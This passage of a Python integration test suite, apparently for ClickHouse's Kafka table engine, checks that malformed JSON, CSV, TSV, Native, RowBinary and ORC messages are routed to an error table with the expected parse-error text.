CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons = 10, malformed = 0):
s = io.StringIO()
# we don't care on which position error will be added
# (we skip whole broken message), but we need to be
# sure that at least one error will be added,
# otherwise test will fail.
error_pos = random.randint(0,jsons-1)
for i in range (jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
# 64 bad messages, each containing some broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
@pytest.mark.timeout(120)
def test_kafka_formats_with_broken_message(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception.: while executing 'FUNCTION CAST(assumeNotNull(_dummy_0) :: 2, 'UInt16' :: 1) -> CAST(assumeNotNull(_dummy_0), 'UInt16') UInt16 : 4'"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\